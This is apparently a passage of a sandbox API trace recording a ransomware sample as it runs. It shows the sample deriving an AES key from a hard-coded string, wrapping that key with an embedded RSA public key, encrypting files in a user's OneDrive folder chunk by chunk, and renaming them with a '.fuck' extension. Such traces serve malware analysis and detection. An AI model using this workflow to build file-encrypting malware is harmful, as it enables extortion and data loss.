lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\CollectOneDriveLogs.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\collectonedrivelogs.bat"), bFailIfExists=0) returned 1 [0270.519] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\CollectOneDriveLogs.bat", dwFileAttributes=0x0) returned 1 [0270.519] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\CollectOneDriveLogs.bat.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\collectonedrivelogs.bat.gsg")) returned 1 [0270.548] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\CollectOneDriveLogs.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\collectonedrivelogs.bat"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\CollectOneDriveLogs.bat.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\collectonedrivelogs.bat.fuck")) returned 1 [0270.661] CryptDestroyHash (hHash=0x2fa3c8) returned 1 [0270.661] CryptDestroyKey (hKey=0x2fa748) returned 1 [0270.661] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0270.661] FindNextFileA (in: hFindFile=0x2fa788, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0270.661] FindNextFileA (in: hFindFile=0x2fa788, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0270.661] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0270.661] GetLastError () returned 0x0 [0270.662] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ExclusionList.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\exclusionlist.xml")) returned 0x20 [0270.711] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ExclusionList.xml", dwFileAttributes=0x80) returned 1 [0270.715] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ExclusionList.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\exclusionlist.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0270.716] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ExclusionList.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\exclusionlist.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0270.718] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ExclusionList.xml.gsg", dwFileAttributes=0x2) returned 1 [0270.718] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0270.721] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0270.721] lstrlenA (lpString="lmouxGpZErYqCdPYwMrzoSBazMlQm") returned 29 [0270.721] CryptHashData (hHash=0x2fa488, pbData=0x28cb3c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0270.721] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa488, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa208) returned 1 [0270.721] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0270.721] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0270.721] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f27440) returned 1 [0270.722] CryptImportPublicKeyInfo (in: hCryptProv=0x2f27440, dwCertEncodingType=0x1, pInfo=0x2f320f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f32120*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f32128*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fa648) returned 1 [0270.722] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0270.722] CryptEncrypt (in: hKey=0x2fa648, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f27880*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f27880*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0270.722] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f27880*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f27880*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0270.724] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.727] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.727] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.729] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.729] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.729] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.729] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.729] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.729] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.729] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.730] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.730] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.730] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.730] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.730] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.730] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.730] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.730] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.730] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.730] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.730] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.730] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.730] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.730] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.731] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.731] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.731] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.731] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.731] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.731] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.731] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.731] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.731] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.731] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.731] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.731] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.731] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.731] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.731] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.732] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.732] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.732] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.732] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.732] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.732] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.732] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.732] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.732] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.732] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.732] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.732] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.733] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.733] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.733] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.733] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.733] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.733] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.733] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.733] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.733] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.734] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.734] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.734] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.734] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.734] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.734] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.734] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x15f, lpOverlapped=0x0) returned 1 [0270.734] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x15f, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x160) returned 1 [0270.734] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x160, lpOverlapped=0x0) returned 1 [0270.734] CloseHandle (hObject=0x5d48) returned 1 [0270.734] CloseHandle (hObject=0x5d3c) returned 1 [0270.735] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ExclusionList.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\exclusionlist.xml.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ExclusionList.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\exclusionlist.xml"), bFailIfExists=0) returned 1 [0270.739] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ExclusionList.xml", dwFileAttributes=0x0) returned 1 [0270.740] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ExclusionList.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\exclusionlist.xml.gsg")) returned 1 [0270.742] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ExclusionList.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\exclusionlist.xml"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ExclusionList.xml.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\exclusionlist.xml.fuck")) returned 1 [0270.744] CryptDestroyHash (hHash=0x2fa488) returned 1 [0270.744] CryptDestroyKey (hKey=0x2fa208) returned 1 [0270.744] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0270.744] FindNextFileA (in: hFindFile=0x2fa788, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0270.744] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\is\\*.*", 